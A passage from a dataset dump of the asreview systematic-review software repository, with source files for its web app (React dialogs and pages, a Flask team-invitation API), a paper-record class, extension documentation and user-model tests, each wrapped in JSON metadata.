.. figure:: ../images/project_export_dataset.png\n :alt: ASReview LAB dataset download\n\n.. note::\n\n A RIS file can only be exported if a RIS file is imported.\n" }, { "alpha_fraction": 0.5872129201889038, "alphanum_fraction": 0.6021105051040649, "avg_line_length": 23.014286041259766, "blob_id": "c71344c437e17e5693d8c19414569c846a6b5ce7", "content_id": "9eddcba2b6686a00bc4185881dd76239f7bfd2ef", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "JavaScript", "length_bytes": 1611, "license_type": "permissive", "max_line_length": 75, "num_lines": 70, "path": "/asreview/webapp/src/ProjectComponents/TeamComponents/AcceptanceDialog.js", "repo_name": "terrymyc/asreview", "src_encoding": "UTF-8", "text": "import * as React from \"react\";\nimport { Dialog, Divider } from \"@mui/material\";\nimport { styled } from \"@mui/material/styles\";\nimport AcceptanceContents from \"./AcceptanceContents\";\nimport DialogHeader from \"./DialogHeader\";\n\nconst PREFIX = \"SetupDialog\";\n\nconst classes = {\n content: `${PREFIX}-content`,\n stepper: `${PREFIX}-stepper`,\n form: `${PREFIX}-form`,\n formWarmup: `${PREFIX}-form-warmup`,\n};\n\nconst StyledDialog = styled(Dialog)(({ theme }) => ({\n [`& .${classes.content}`]: {\n paddingLeft: 0,\n paddingRight: 0,\n overflowY: \"hidden\",\n },\n\n [`& .${classes.stepper}`]: {\n padding: 8,\n },\n\n [`& .${classes.form}`]: {\n height: \"calc(100% - 60px)\",\n overflowY: \"scroll\",\n padding: \"32px 48px 48px 48px\",\n },\n\n [`& .${classes.formWarmup}`]: {\n alignItems: \"center\",\n display: \"flex\",\n justifyContent: \"center\",\n },\n}));\n\nconst AcceptanceDialog = (props) => {\n const handleClose = () => {\n props.onClose();\n };\n\n return (\n <StyledDialog\n aria-label=\"acceptance dialog\"\n open={props.open}\n fullScreen={props.mobileScreen}\n fullWidth\n maxWidth=\"md\"\n PaperProps={{\n sx: { height: !props.mobileScreen ? 
\"calc(100% - 96px)\" : \"100%\" },\n }}\n >\n <DialogHeader\n title=\"Collaboration invitations\"\n handleClose={handleClose}\n />\n <Divider />\n <AcceptanceContents\n projectInvitations={props.projectInvitations}\n handleAcceptance={props.handleAcceptance}\n handleRejection={props.handleRejection}\n />\n </StyledDialog>\n );\n};\n\nexport default AcceptanceDialog;\n" }, { "alpha_fraction": 0.601341187953949, "alphanum_fraction": 0.6087313294410706, "avg_line_length": 33.630332946777344, "blob_id": "71c746bb4f6532cbdf261724422ec888d8c1bf24", "content_id": "e52542670f0cb416195e5378e0a7f216ed2c8208", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 7307, "license_type": "permissive", "max_line_length": 85, "num_lines": 211, "path": "/asreview/webapp/api/team.py", "repo_name": "terrymyc/asreview", "src_encoding": "UTF-8", "text": "from flask import Blueprint\nfrom flask import jsonify\nfrom flask_login import current_user\nfrom sqlalchemy import and_\nfrom sqlalchemy.exc import SQLAlchemyError\n\nfrom asreview.project import ASReviewProject\nfrom asreview.webapp import DB\nfrom asreview.webapp.authentication.login_required import asreview_login_required\nfrom asreview.webapp.authentication.models import Project\nfrom asreview.webapp.authentication.models import User\n\nbp = Blueprint(\"team\", __name__, url_prefix=\"/api\")\n\nREQUESTER_FRAUD = {\"message\": \"Request can not made by current user.\"}\n\n\[email protected](\"/projects/<project_id>/users\", methods=[\"GET\"])\n@asreview_login_required\ndef users(project_id):\n \"\"\"Returns all users involved in a project.\"\"\"\n response = jsonify(REQUESTER_FRAUD), 404\n\n # get project\n project = Project.query.filter(Project.project_id == project_id).one_or_none()\n\n # check if this project is in fact from current user\n if project in current_user.projects:\n # get associated users from project\n collaborators = project.collaborators\n invitations = project.pending_invitations\n\n # get all users that are involved (invited or collabo)\n collaborators = [user.id for user in collaborators]\n invitations = [user.id for user in invitations]\n\n # get all users minus myself\n all_users = [\n u.summarize()\n for u in User.query.filter(and_(User.public, User.id != current_user.id))\n .order_by(\"name\")\n .all()\n ]\n\n # response\n response = (\n jsonify(\n {\n \"all_users\": all_users,\n \"collaborators\": collaborators,\n \"invitations\": invitations,\n }\n ),\n 200,\n )\n return response\n\n\[email protected](\"/projects/<project_id>/users/<user_id>\", methods=[\"DELETE\"])\n@asreview_login_required\ndef end_collaboration(project_id, user_id):\n \"\"\"Project owner removes a collaborator, or collaborator\n removes him/herself.\"\"\"\n response = jsonify(REQUESTER_FRAUD), 404\n # get project\n project = Project.query.filter(Project.project_id == project_id).one_or_none()\n\n # check if project is owned by current user or if the user is\n # involved in the project\n if project and (\n (project.owner == current_user) or (project in current_user.involved_in)\n ):\n user = DB.session.get(User, user_id)\n\n try:\n project.collaborators.remove(user)\n DB.session.commit()\n response = (\n jsonify({\"message\": \"Collaborator removed from project.\"}),\n 200\n )\n\n except SQLAlchemyError:\n response = (\n jsonify({\"message\": \"Error removing collaborator.\"}),\n 404\n )\n return response\n\n\[email protected](\"/invitations\", methods=[\"GET\"])\n@asreview_login_required\ndef 
pending_invitations():\n \"\"\"Returns pending invitations for current user.\"\"\"\n invitations = []\n for p in current_user.pending_invitations:\n # get path of project\n path = p.project_path\n # get object to get name\n asreview_object = ASReviewProject(path)\n # append info\n invitations.append(\n {\n \"id\": p.id,\n \"project_id\": p.project_id,\n \"owner_id\": p.owner_id,\n \"name\": asreview_object.config[\"name\"],\n \"created_at_unix\": asreview_object.config[\"created_at_unix\"],\n \"mode\": asreview_object.config[\"mode\"],\n }\n )\n response = (jsonify({\"invited_for_projects\": invitations}), 200)\n return response\n\n\[email protected](\"/invitations/projects/<project_id>/users/<user_id>\", methods=[\"POST\"])\n@asreview_login_required\ndef invite(project_id, user_id):\n \"\"\"Project owner invites a user to collaborate on a project\"\"\"\n response = jsonify(REQUESTER_FRAUD), 404\n # get project\n project = Project.query.filter(Project.project_id == project_id).one_or_none()\n # check if project is from current user\n if project and project.owner == current_user:\n user = DB.session.get(User, user_id)\n project.pending_invitations.append(user)\n try:\n DB.session.commit()\n response = (\n jsonify({\"message\": f'User \"{user.identifier}\" invited.'}),\n 200\n )\n except SQLAlchemyError:\n response = (\n jsonify({\"message\": f'User \"{user.identifier}\" not invited.'}),\n 404,\n )\n return response\n\n\[email protected](\"/invitations/projects/<project_id>/accept\", methods=[\"POST\"])\n@asreview_login_required\ndef accept_invitation(project_id):\n \"\"\"Invited person accepts an invitation.\"\"\"\n response = jsonify(REQUESTER_FRAUD), 404\n # get project\n project = Project.query.filter(Project.project_id == project_id).one_or_none()\n # if user is current user, try to add this user to project\n if project and current_user in project.pending_invitations:\n # remove invitation\n project.pending_invitations.remove(current_user)\n # add as collaborator\n project.collaborators.append(current_user)\n try:\n DB.session.commit()\n response = (\n jsonify({\"message\": \"User accepted invitation for project.\"}),\n 200\n )\n except SQLAlchemyError:\n response = (\n jsonify({\"message\": \"Error accepting invitation.\"}),\n 404\n )\n return response\n\n\[email protected](\"/invitations/projects/<project_id>/reject\", methods=[\"DELETE\"])\n@asreview_login_required\ndef reject_invitation(project_id):\n \"\"\"Invited person rejects an invitation.\"\"\"\n response = jsonify(REQUESTER_FRAUD), 404\n # get project\n project = Project.query.filter(Project.project_id == project_id).one_or_none()\n # if current_user is indeed invited\n if project and current_user in project.pending_invitations:\n # remove invitation\n project.pending_invitations.remove(current_user)\n try:\n DB.session.commit()\n response = (\n jsonify({\"message\": \"User rejected invitation for project.\"}),\n 200\n )\n except SQLAlchemyError:\n response = (\n jsonify({\"message\": \"Error rejecting invitation.\"}),\n 404\n )\n return response\n\n\[email protected](\"/invitations/projects/<project_id>/users/<user_id>\", methods=[\"DELETE\"])\n@asreview_login_required\ndef delete_invitation(project_id, user_id):\n \"\"\"removes an invitation\"\"\"\n response = jsonify(REQUESTER_FRAUD), 404\n # get project\n project = Project.query.filter(Project.project_id == project_id).one_or_none()\n # check if project is from current user\n if project and project.owner == current_user:\n # get user\n user = DB.session.get(User, 
user_id)\n # remove from project\n project.pending_invitations.remove(user)\n try:\n DB.session.commit()\n response = jsonify({\"message\": \"Owner deleted invitation.\"}), 200\n except SQLAlchemyError:\n response = jsonify({\"message\": \"Error deleting invitation.\"}), 404\n return response\n" }, { "alpha_fraction": 0.5613059997558594, "alphanum_fraction": 0.5680791735649109, "avg_line_length": 26.816425323486328, "blob_id": "e6bc1b4d06ff517082e14f186f6274ff316baf1c", "content_id": "62c9140cee10dad1a8d23b33aafc134f1693f87a", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 5758, "license_type": "permissive", "max_line_length": 76, "num_lines": 207, "path": "/asreview/io/paper_record.py", "repo_name": "terrymyc/asreview", "src_encoding": "UTF-8", "text": "# Copyright 2019-2022 The ASReview Authors. All Rights Reserved.\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\nimport os\n\nimport pandas as pd\n\nfrom asreview.config import LABEL_NA\nfrom asreview.utils import format_to_str\n\n\ndef preview_record(record, w_title=80, w_authors=40, automatic_width=False):\n \"\"\"Return a single line preview string for record i.\n\n Arguments\n ---------\n record: PaperRecord\n The paperRecord to preview.\n w_title: int\n Width to be allocated for the title of the paper.\n w_authors: int\n Width to be allocated for the authors of the paper.\n automatic_width: bool\n If true, compute w_title, w_authors from the console width.\n\n Returns\n -------\n str:\n A string that previews a paper record.\n \"\"\"\n if automatic_width:\n term_width = os.get_terminal_size().columns\n width_available = term_width - 7\n w_title = round((2 / 3) * width_available)\n w_authors = width_available - w_title\n title_str = \"\"\n author_str = \"\"\n heading = record.title\n if heading is None:\n heading = record.abstract\n if heading is not None:\n if len(heading) > w_title:\n title_str = heading[: w_title - 2] + \"..\"\n else:\n title_str = heading\n\n if record.authors is not None:\n cur_authors = format_to_str(record.authors)\n if len(cur_authors) > w_authors:\n author_str = cur_authors[: w_authors - 2] + \"..\"\n else:\n author_str = cur_authors\n format_str = \"{0: <\" + str(w_title) + \"} \" + \"{1: <\" + str(w_authors)\n format_str += \"}\"\n prev_str = format_str.format(title_str, author_str)\n return prev_str\n\n\ndef format_record(record, use_cli_colors=True):\n \"\"\"Format one record for displaying in the CLI.\n\n Arguments\n ---------\n record: PaperRecord\n The paperRecord to format.\n use_cli_colors: bool\n Some terminals support colors, set to True to use them.\n\n Returns\n -------\n str:\n A string including title, abstracts and authors.\n \"\"\"\n if record.title is not None:\n title = record.title\n if use_cli_colors:\n title = \"\\033[95m\" + title + \"\\033[0m\"\n title += \"\\n\"\n else:\n title = \"\"\n\n if record.authors is not None and len(record.authors) > 0:\n authors = format_to_str(record.authors) + \"\\n\"\n else:\n 
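# no author information available; leave the author line empty\n 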
authors = \"\"\n\n if record.abstract is not None and len(record.abstract) > 0:\n abstract = record.abstract\n abstract = \"\\n\" + abstract + \"\\n\"\n else:\n abstract = \"\"\n\n if record.included == 0:\n label = \"IRRELEVANT\"\n elif record.included == 1:\n label = \"RELEVANT\"\n else:\n label = \"\"\n\n header = f\"---{record.record_id}---{label}---\"\n\n return f\"\\n{header:-<60}\\n{title}{authors}{abstract}\"\n\n\nclass PaperRecord:\n \"\"\"A single record from a paper in a systematic review.\n\n Arguments\n ---------\n record_id: int\n Some identifier for this record.\n title: str\n Paper title.\n abstract: str\n Paper abstract.\n authors: str, list\n Authors of the paper.\n notes: str, list\n Notes of the paper.\n keywords: str, list\n Keywords of the paper.\n label: int\n Current label of the paper. No label is indicated by\n asreview.config.LABEL_NA (== -1).\n kwargs: dict\n Any extra keyword arguments will be put in self.extra_fields.\n \"\"\"\n\n def __init__(self, record_id, column_spec={}, **kwargs):\n for attr in [\n \"title\",\n \"abstract\",\n \"authors\",\n \"notes\",\n \"keywords\",\n \"doi\",\n \"url\",\n \"included\",\n ]:\n if attr in column_spec:\n col = column_spec[attr]\n elif attr in kwargs:\n col = attr\n else:\n col = None\n\n attr_val = kwargs.pop(col, None)\n if attr_val is not None and pd.isna(attr_val):\n attr_val = None\n setattr(self, attr, attr_val)\n\n self.record_id = record_id\n if self.included is None:\n self.included = LABEL_NA\n else:\n self.included = int(self.included)\n\n self.extra_fields = kwargs\n\n for attr, val in self.extra_fields.items():\n if not isinstance(val, list) and pd.isna(val):\n self.extra_fields[attr] = None\n\n def __str__(self):\n return format_record(self)\n\n @property\n def text(self):\n \"\"\"Create a single string from title + abstract.\n\n Returns\n -------\n str:\n Concatenated string from title + abstract.\n \"\"\"\n title = self.title\n abstract = self.abstract\n if title is None:\n title = \"\"\n if abstract is None:\n abstract = \"\"\n return title + \" \" + abstract\n\n @property\n def heading(self):\n \"\"\"Return the title of the paper.\"\"\"\n if self.title is None:\n return \"\"\n return self.title\n\n @property\n def body(self):\n \"\"\"Return the abstract of the paper.\"\"\"\n if self.abstract is None:\n return \"\"\n return self.abstract\n" }, { "alpha_fraction": 0.758849561214447, "alphanum_fraction": 0.7617993950843811, "avg_line_length": 38.30434799194336, "blob_id": "25befe350c47b6949e8ef1921d602bc34c84be8e", "content_id": "e3a3fa6055f91c4f76de55ce731254330c901b6d", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "reStructuredText", "length_bytes": 2712, "license_type": "permissive", "max_line_length": 347, "num_lines": 69, "path": "/docs/source/extensions_overview.rst", "repo_name": "terrymyc/asreview", "src_encoding": "UTF-8", "text": "Extensions\n==========\n\nASReview has extensive support for extensions. They can extend the\nfunctionality of ASReview LAB, and the\n:doc:`Command Line Interface <cli>`. There are :ref:`officially\nsupported extensions <extensions-official>` and `community maintained extensions <https://github.com/asreview/asreview/discussions/1140>`_.\n\nLooking to develop your own extension? See :ref:`develop-extensions` for\ndetailed instructions.\n\n\nInstallation\n------------\n\nMost extensions are installable from PyPI (the same way ASReview LAB is\ninstalled) or GitHub. 
It is preferred to follow the installation instructions\nprovided by the extension.\n\nThe following example shows the installation of `ASReview Insights\n<https://github.com/asreview/ASReview-insights>`__, an extension for plotting\nand computing metrics for simulations in ASReview.\n\n.. code:: bash\n\n pip install asreview-insights\n\nExtensions published only on GitHub can be installed directly from the\nrepository. Replace `{USER_NAME}` and `{REPO_NAME}` with the corresponding\nvalues for the extension.\n\n.. code:: bash\n\n pip install git+https://github.com/{USER_NAME}/{REPO_NAME}.git\n\n\n.. _extensions-official:\n\nSupported Extensions\n--------------------\n\nThe following extensions are officially supported and maintained by the\nmaintainers of ASReview LAB. They are extensively tested and integrate well\nwith ASReview LAB.\n\n* ASReview Datatools\n - `ASReview-datatools <https://github.com/asreview/asreview-datatools>`__:\n Tool for describing and cleaning (input) data, and for converting file formats via the command line.\n\n* ASReview Insights\n - `ASReview-insights <https://github.com/asreview/asreview-insights>`__:\n Advanced insights into ASReview simulations, such as performance plots and metrics.\n\n* ASReview Wordcloud\n - `ASReview-wordcloud <https://github.com/asreview/asreview-wordcloud>`__: Create wordclouds to visualize the contents of datasets.\n\n* ASReview Makita\n - `ASReview-makita <https://github.com/asreview/asreview-makita>`__: ASReview's Makita (MAKe IT Automatic) is a workflow generator for simulation studies that use the command line interface of ASReview LAB. Makita simplifies simulation research by generating the framework and code for your study.\n\n\n.. _extensions-community:\n\nList of extensions for ASReview LAB\n-----------------------------------\n\nThe `List of extensions for ASReview LAB <https://github.com/asreview/asreview/discussions/1140>`__ on the Discussion platform\ngives an overview of known extensions to ASReview LAB and other useful tools\nin the AI-aided systematic review pipeline. 
These extensions can extend the\nsoftware with new models, subcommands, and datasets.\n" }, { "alpha_fraction": 0.651833713054657, "alphanum_fraction": 0.661644458770752, "avg_line_length": 26.798702239990234, "blob_id": "34c96ee4d296e393daf7ed9b06cb1d2f3e4ce107", "content_id": "9539e99402b2d011041ac295c40a58ff48dd48dd", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 8562, "license_type": "permissive", "max_line_length": 88, "num_lines": 308, "path": "/asreview/webapp/tests/test_database_and_models/test_user_model.py", "repo_name": "terrymyc/asreview", "src_encoding": "UTF-8", "text": "from datetime import datetime as dt\nfrom datetime import timedelta\n\nimport pytest\nfrom sqlalchemy.exc import IntegrityError\n\nimport asreview.webapp.tests.utils.config_parser as cp\nimport asreview.webapp.tests.utils.crud as crud\nfrom asreview.webapp import DB\nfrom asreview.webapp.authentication.models import User\n\n# #############\n# CREATE\n# #############\n\n\n# test identifier validation\ndef test_user_must_have_identifier(setup_teardown):\n user = crud.create_user(DB)\n with pytest.raises(ValueError):\n user.identifier = None\n\n with pytest.raises(ValueError):\n user.identifier = \"\"\n\n\n# test uniqueness of identifier\ndef test_uniqueness_of_identifier(setup_teardown):\n user1 = crud.create_user(DB)\n assert crud.count_users() == 1\n # create second user with identical identifier\n user2 = cp.get_user(2)\n # set to an existing identifier\n user2.identifier = user1.identifier\n with pytest.raises(IntegrityError):\n crud.create_user(DB, user2)\n\n\n# test origin validation\ndef test_user_must_have_origin(setup_teardown):\n user = crud.create_user(DB)\n with pytest.raises(ValueError):\n user.origin = None\n\n with pytest.raises(ValueError):\n user.origin = \"\"\n\n\n# test name validation\ndef test_user_must_have_name(setup_teardown):\n user = crud.create_user(DB)\n with pytest.raises(ValueError, match=\"Name is required\"):\n user.name = None\n\n with pytest.raises(ValueError, match=\"Name is required\"):\n user.name = \"\"\n\n with pytest.raises(ValueError, match=\"Name must contain more than 2 characters\"):\n user.name = \"a\"\n\n with pytest.raises(ValueError, match=\"Name must contain more than 2 characters\"):\n user.name = \"ab\"\n\n\n# test if email is not blank if origin is \"asreview\"\ndef test_email_validation_1(setup_teardown):\n user = crud.create_user(DB)\n user.origin = \"asreview\"\n with pytest.raises(ValueError, match=\"Email is required when origin is 'asreview'\"):\n user.email = None\n\n with pytest.raises(ValueError, match=\"Email is required when origin is 'asreview'\"):\n user.email = \"\"\n\n\n# test if all fails when email is invalid\ndef test_email_validation_2(setup_teardown):\n user_data = crud.create_user(DB)\n invalid_email = \"invalid\"\n\n with pytest.raises(\n ValueError, match=f\"Email address '{invalid_email}' is not valid\"\n ):\n User(\n invalid_email,\n email=invalid_email,\n name=user_data.name,\n origin=\"asreview\",\n password=\"ABCd1234!\",\n )\n\n\n# test uniqueness of email\ndef test_uniqueness_of_email(setup_teardown):\n user1 = crud.create_user(DB)\n assert crud.count_users() == 1\n # create second user with identical email\n user2 = cp.get_user(2)\n # set to an existing identifier\n user2.email = user1.email\n with pytest.raises(IntegrityError):\n crud.create_user(DB, user2)\n\n\n# test if all fails when password doesn't meet requirements\[email protected](\n \"password\", 
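# one failing value per requirement: empty, missing, too short, letters only, digits only\n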
[\"\", None, \"a1!\", \"aaaaaaaaaaaaa\", \"1111111111111\"]\n)\ndef test_password_validation(setup_teardown, password):\n with pytest.raises(\n ValueError, match=f'Password \"{str(password)}\" does not meet requirements'\n ):\n User(\n \"[email protected]\",\n email=\"[email protected]\",\n name=\"Casper\",\n origin=\"asreview\",\n password=password,\n )\n\n\n# Verify we can add a user record\ndef test_add_user_record(setup_teardown):\n user = crud.create_user(DB)\n # verify we have 1 record\n assert crud.count_users() == 1\n assert crud.last_user() == user\n\n\n# #############\n# UPDATE\n# #############\n\n\n# Verify we can update a user record\ndef test_update_user_record(setup_teardown):\n user = crud.create_user(DB)\n old_hashed_password = user.hashed_password\n\n new_email = \"[email protected]\"\n new_name = \"New Name\"\n new_affiliation = \"New Affiliation\"\n new_password = \"NewPassword@123\"\n new_public = False\n\n user.update_profile(\n email=new_email,\n name=new_name,\n affiliation=new_affiliation,\n password=new_password,\n public=new_public,\n )\n DB.session.commit()\n\n # verify we have 1 record\n assert crud.count_users() == 1\n updated_user = crud.last_user()\n # assert identifier remained the same\n assert updated_user.identifier != new_email\n # assert changes\n assert updated_user.email == new_email\n assert updated_user.affiliation == new_affiliation\n assert updated_user.hashed_password != old_hashed_password\n assert updated_user.public == new_public\n\n\n# verify reset password\ndef test_update_password(setup_teardown):\n user = crud.create_user(DB)\n old_hashed_password = user.hashed_password\n\n new_password = \"NewPassword@123\"\n user.reset_password(new_password)\n DB.session.commit()\n\n # verify we have 1 record\n assert crud.count_users() == 1\n updated_user = crud.last_user()\n assert updated_user.hashed_password != old_hashed_password\n\n\n# verify setting token and salt\ndef test_set_token(setup_teardown):\n user = crud.create_user(DB)\n\n assert user.token is None\n assert user.token_created_at is None\n\n user.set_token_data(\"secret\", \"salt\")\n DB.session.commit()\n\n # verify we have 1 record\n assert crud.count_users() == 1\n updated_user = crud.last_user()\n\n assert updated_user.token is not None\n assert updated_user.token_created_at is not None\n assert isinstance(updated_user.token_created_at, dt)\n\n\n# verify token validity, by default token is 24 hours valid\[email protected](\n \"subtract_time\", [(10, 0, True), (23, 59, True), (24, 1, False), (25, 0, False)]\n)\ndef test_token_validity(setup_teardown, subtract_time):\n subtract_hours, subtract_mins, validity = subtract_time\n user = crud.create_user(DB)\n user.set_token_data(\"secret\", \"salt\")\n DB.session.commit()\n # verify we have 1 record\n assert crud.count_users() == 1\n\n # assert token is valid\n token = user.token\n token_created_at = user.token_created_at\n assert user.token_valid(token)\n\n # now subtract hours\n new_token_created_time = token_created_at - timedelta(\n hours=subtract_hours, minutes=subtract_mins\n )\n # update token_created_at\n user.token_created_at = new_token_created_time\n\n # assert token validity\n assert user.token_valid(token) == validity\n\n\n# test confirming a user\ndef test_confirm_user(setup_teardown):\n user = crud.create_user(DB)\n # create a token for good measures\n user.set_token_data(\"secret\", \"salt\")\n\n assert user.confirmed is False\n assert bool(user.token)\n assert bool(user.token_created_at)\n\n # now lets confirm\n 
user.confirm_user()\n\n assert user.confirmed\n assert user.token is None\n assert user.token_created_at is None\n\n\n# #############\n# DELETE\n# #############\n\n\n# test deleting a user means deleting all projects\ndef test_deleting_user(setup_teardown):\n user, projects = crud.create_user1_with_2_projects(DB)\n assert crud.count_users() == 1\n assert crud.count_projects() == 2\n # remove the user\n DB.session.delete(user)\n DB.session.commit()\n assert crud.count_users() == 0\n # projects should be gone as well\n assert crud.count_projects() == 0\n\n\n# #############\n# PROPERTIES\n# #############\n\n\n# test projects\ndef test_projects_of_user(setup_teardown):\n crud.create_user1_with_2_projects(DB)\n assert crud.count_users() == 1\n assert crud.count_projects() == 2\n # get user\n user = crud.last_user()\n projects = crud.list_projects()\n assert set(user.projects) == set(projects)\n\n\n# test pending invitations\ndef test_pending_invitations(setup_teardown):\n user1, _ = crud.create_user1_with_2_projects(DB)\n user2 = crud.create_user(DB, user=2)\n assert crud.count_users() == 2\n assert crud.count_projects() == 2\n user1 = crud.get_user_by_id(user1.id)\n project = user1.projects[0]\n project.pending_invitations.append(user2)\n DB.session.commit()\n # fresh object\n user2 = crud.get_user_by_id(user2.id)\n assert project in user2.pending_invitations\n\n\n# test collaborations\ndef test_collaboration(setup_teardown):\n user1, _ = crud.create_user1_with_2_projects(DB)\n user2 = crud.create_user(DB, user=2)\n assert crud.count_users() == 2\n assert crud.count_projects() == 2\n user1 = crud.get_user_by_id(user1.id)\n project = user1.projects[0]\n project.collaborators.append(user2)\n DB.session.commit()\n # fresh object\n user2 = crud.get_user_by_id(user2.id)\n assert project in user2.involved_in\n" }, { "alpha_fraction": 0.5305095911026001, "alphanum_fraction": 0.5316271781921387, "avg_line_length": 28.241830825805664, "blob_id": "fd0dd0b1352392641ff3fdd6327b4fe2a87720ab", "content_id": "3ba300b58d5f2f12a07c93984884d458f10d3a9b", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "JavaScript", "length_bytes": 8948, "license_type": "permissive", "max_line_length": 75, "num_lines": 306, "path": "/asreview/webapp/src/ProjectComponents/ProjectPage.js", "repo_name": "terrymyc/asreview", "src_encoding": "UTF-8", "text": "import * as React from \"react\";\nimport { useQuery, useQueryClient } from \"react-query\";\nimport { connect, useSelector } from \"react-redux\";\n\nimport {\n Routes,\n Route,\n useMatch,\n useNavigate,\n useParams,\n useResolvedPath,\n} from \"react-router-dom\";\nimport clsx from \"clsx\";\nimport { Box } from \"@mui/material\";\nimport { styled } from \"@mui/material/styles\";\n\nimport { DialogErrorHandler } from \"../Components\";\nimport { AnalyticsPage } from \"../ProjectComponents/AnalyticsComponents\";\nimport { DetailsPage } from \"../ProjectComponents/DetailsComponents\";\nimport { HistoryPage } from \"../ProjectComponents/HistoryComponents\";\nimport { ExportPage } from \"../ProjectComponents/ExportComponents\";\nimport { TeamPage } from \"./TeamComponents\";\n\nimport {\n ReviewPage,\n ReviewPageFinished,\n} from \"../ProjectComponents/ReviewComponents\";\nimport RouteNotFound from \"../RouteNotFound\";\n\nimport { ProjectAPI } from \"../api/index.js\";\nimport {\n checkIfSimulationFinishedDuration,\n drawerWidth,\n mapDispatchToProps,\n projectModes,\n projectStatuses,\n} from \"../globals.js\";\nimport useAuth from 
\"../hooks/useAuth\";\n\nconst PREFIX = \"ProjectPage\";\n\nconst classes = {\n content: `${PREFIX}-content`,\n contentShift: `${PREFIX}-contentShift`,\n};\n\nconst Root = styled(\"div\")(({ theme }) => ({\n [`& .${classes.content}`]: {\n transition: theme.transitions.create(\"margin\", {\n easing: theme.transitions.easing.sharp,\n duration: theme.transitions.duration.leavingScreen,\n }),\n [theme.breakpoints.up(\"md\")]: {\n marginLeft: 72,\n },\n },\n\n [`& .${classes.contentShift}`]: {\n transition: theme.transitions.create(\"margin\", {\n easing: theme.transitions.easing.easeOut,\n duration: theme.transitions.duration.enteringScreen,\n }),\n marginLeft: drawerWidth,\n },\n}));\n\nconst ProjectPage = (props) => {\n const authenticated = useSelector((state) => state.authentication);\n const { auth } = useAuth();\n const queryClient = useQueryClient();\n const navigate = useNavigate();\n const { project_id } = useParams();\n const resolved = useResolvedPath(\"\");\n const match = useMatch({ path: resolved.pathname, end: true });\n\n const isAnalyticsPageOpen = () => {\n return match !== null;\n };\n\n const [isSimulating, setIsSimulating] = React.useState(false);\n\n // is this user the ownwer of this project\n const [isOwner, setIsOwner] = React.useState(false);\n\n // History page state\n const [historyLabel, setHistoryLabel] = React.useState(\"relevant\");\n const [historyFilterQuery, setHistoryFilterQuery] = React.useState([]);\n\n const { data, error, isError, isSuccess } = useQuery(\n [\"fetchInfo\", { project_id }],\n ProjectAPI.fetchInfo,\n {\n enabled: project_id !== undefined,\n onSuccess: (data) => {\n // set ownership\n setIsOwner(auth?.id === data.ownerId);\n if (\n data.reviews[0] === undefined ||\n data[\"reviews\"][0][\"status\"] === projectStatuses.SETUP\n ) {\n // set project id\n props.setProjectId(project_id);\n // open project setup dialog\n navigate(\"/projects\");\n props.toggleProjectSetup();\n } else if (!data[\"projectNeedsUpgrade\"]) {\n // open project page\n console.log(\"Opening project \" + project_id);\n // if simulation is running\n if (\n data[\"mode\"] === projectModes.SIMULATION &&\n data[\"reviews\"][0][\"status\"] === projectStatuses.REVIEW\n ) {\n setIsSimulating(true);\n }\n } else {\n navigate(\"/projects\");\n // open project check dialog\n props.setProjectCheck({\n open: true,\n issue: \"upgrade\",\n path: \"\",\n project_id: project_id,\n });\n }\n },\n refetchOnWindowFocus: false,\n },\n );\n\n const refetchAnalytics = () => {\n if (isAnalyticsPageOpen()) {\n queryClient.invalidateQueries(\"fetchProgress\");\n queryClient.invalidateQueries(\"fetchProgressDensity\");\n queryClient.invalidateQueries(\"fetchProgressRecall\");\n }\n };\n\n const { error: checkSimulationError, isError: isCheckSimulationError } =\n useQuery(\n [\"fetchProjectStatus\", { project_id }],\n ProjectAPI.fetchProjectStatus,\n {\n enabled: isSimulating,\n onSuccess: (data) => {\n if (data[\"status\"] === \"finished\") {\n // refresh analytics\n refetchAnalytics();\n // simulation finished\n setIsSimulating(false);\n queryClient.invalidateQueries(\"fetchInfo\");\n } else {\n // not finished yet\n setTimeout(\n () => queryClient.invalidateQueries(\"fetchProjectStatus\"),\n checkIfSimulationFinishedDuration,\n );\n }\n },\n refetchOnWindowFocus: false,\n },\n );\n\n const returnError = () => {\n if (isError) {\n return [\"fetchInfo\", error, isError];\n } else if (isCheckSimulationError) {\n return [\n \"fetchProjectStatus\",\n checkSimulationError,\n isCheckSimulationError,\n 
];\n } else {\n return [\"\", null, false];\n }\n };\n\n return (\n <Root aria-label=\"project page\">\n <Box\n component=\"main\"\n className={clsx(\"main-page-content\", classes.content, {\n [classes.contentShift]: !props.mobileScreen && props.onNavDrawer,\n })}\n aria-label=\"project page content\"\n >\n <Routes>\n {/* Analytics */}\n {isSuccess && !data?.projectNeedsUpgrade && (\n <Route\n index\n element={\n <AnalyticsPage\n isSimulating={isSimulating}\n mobileScreen={props.mobileScreen}\n mode={data?.mode}\n refetchAnalytics={refetchAnalytics}\n />\n }\n />\n )}\n\n {/* Review */}\n {isSuccess &&\n !data?.projectNeedsUpgrade &&\n data?.reviews[0].status === projectStatuses.REVIEW && (\n <Route\n path=\"review\"\n element={\n <ReviewPage\n mobileScreen={props.mobileScreen}\n projectMode={data?.mode}\n fontSize={props.fontSize}\n undoEnabled={props.undoEnabled}\n keyPressEnabled={props.keyPressEnabled}\n />\n }\n />\n )}\n\n {/* Review finished */}\n {isSuccess &&\n !data?.projectNeedsUpgrade &&\n data?.reviews[0].status === projectStatuses.FINISHED && (\n <Route\n path=\"review\"\n element={\n <ReviewPageFinished mobileScreen={props.mobileScreen} />\n }\n />\n )}\n\n {/* History */}\n {isSuccess && !data?.projectNeedsUpgrade && (\n <Route\n path=\"history\"\n element={\n <HistoryPage\n filterQuery={historyFilterQuery}\n label={historyLabel}\n isSimulating={isSimulating}\n mobileScreen={props.mobileScreen}\n mode={data?.mode}\n 